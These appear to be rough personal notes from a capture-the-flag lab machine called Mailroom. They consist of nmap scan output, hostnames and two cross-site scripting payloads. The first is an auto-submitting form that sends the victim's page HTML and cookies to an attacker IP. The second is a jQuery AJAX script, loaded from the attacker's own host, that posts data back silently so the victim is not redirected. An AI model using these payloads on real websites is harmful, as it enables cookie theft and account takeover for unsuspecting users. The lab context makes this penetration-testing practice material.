[ its in kilslquad thread ]mailroom

22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 94bb2ffcaeb9b182afd789811aa76ce5 (RSA)
|   256 821beb758b9630cf946e7957d9ddeca7 (ECDSA)
|_  256 19fb45feb9e4275de5bbf35497dd68cf (ED25519)
80/tcp open  http    Apache httpd 2.4.54 ((Debian))
|_http-server-header: Apache/2.4.54 (Debian)
|_http-title: The Mail Room

git.mailroom.htb and mailroom.htb

2fa thingy on the git

autosubmit form

<form id="autosubmit" action="<http://10.10.17.80:8081>" enctype="text/plain" method="POST">
    <input id="1" name="1" type="hidden" />
    <input id="2" name="2" type="hidden" />
    <input type="submit" value="Submit Request" />
</form>
 
<script>
    document.getElementById("1").value = JSON.stringify(document.body.innerHTML);
		document.getElementById("2").value = JSON.stringify(document.cookie);
    document.getElementById("autosubmit").submit();
</script>

postserv

the inquiry persists for a while, even after viewed

lets use ajax so person isn’t redirect

wget our own copy of https://code.jquery.com/jquery-3.6.0.min.js and host it on 999

<script src="<http://10.10.17.80:9999/jquery-3.6.0.min.js>"> </script>
	<script>
		$(document).ready(function() {

			var result = $.ajax({
				url: '<http://10.10.17.80:8081>',
				method: 'POST',
				cache: false,
				async: false,
				data: {'bruh':'bruh'},
				success: function(response) {
					console.log("Success 1");
				},
				error: function(data) {
					console.log("Fail 1");
					console.log(data.responseText);
				}
			}).responseText;
			$.ajax({
				url: '<http://10.10.17.80:8081>',
				method: 'POST',
				cache: false,
				data: {'2ndpost':result},
				async: false,
				success: function(response) {
					console.log("Success 2");
				},
				error: function(data) {
					console.log("Fail 2");
					console.log(data.responseText);
				}
			});
		});
	</script>